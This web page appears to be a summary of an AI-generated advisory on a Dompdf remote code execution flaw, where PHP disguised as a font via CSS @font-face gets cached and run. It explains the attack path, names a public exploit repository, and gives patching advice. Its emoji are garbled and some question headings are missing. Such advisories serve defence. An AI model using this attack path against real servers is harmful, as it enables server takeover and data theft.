This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: Dompdf < 1.2.1 has a critical flaw allowing **Remote Code Execution (RCE)** via CSS `@font-face` injection.β¦
π‘οΈ **Root Cause**: Improper validation of CSS `src:url` fields. π **Flaw**: The library fails to sanitize font sources, allowing PHP code to be disguised as a font file and cached by the server. β οΈ
Q3Who is affected? (Versions/Components)
π₯ **Affected**: Users running **Dompdf versions strictly less than 1.2.1**. π¦ **Component**: The HTML-to-PDF conversion library used in PHP applications. π
Q4What can hackers do? (Privileges/Data)
π΅οΈ **Hacker Actions**: Execute arbitrary PHP code on the server. π» **Privileges**: Gain the same privileges as the web server process. ποΈ **Data**: Access, modify, or delete any data the web server can reach. π
Q5Is exploitation threshold high? (Auth/Config)
π **Threshold**: **Low**. πͺ **Auth**: No authentication required for the initial CSS injection. βοΈ **Config**: Requires the target to use vulnerable Dompdf versions and process user-supplied HTML/CSS. π―
Q6Is there a public Exp? (PoC/Wild Exploitation)
π **Public Exp?**: **YES**. π Multiple PoCs exist on GitHub (e.g., `rvizx/CVE-2022-28368`) and ExploitDB. π οΈ Automated Python scripts are available to simplify exploitation. π€
Q7How to self-check? (Features/Scanning)
π **Self-Check**: Scan for Dompdf library versions in your PHP project. π **Feature**: Check if `@font-face` CSS rules are processed from untrusted user input.β¦
π§ **No Patch?**: Sanitize all CSS inputs rigorously. π« **Workaround**: Disable font caching if possible, or restrict `@font-face` usage to trusted, static resources only.β¦
π₯ **Urgency**: **CRITICAL**. π¨ **Priority**: Immediate patching required. β³ RCE vulnerabilities allow total system takeover. πββοΈ Do not delay upgrading to v1.2.1+. π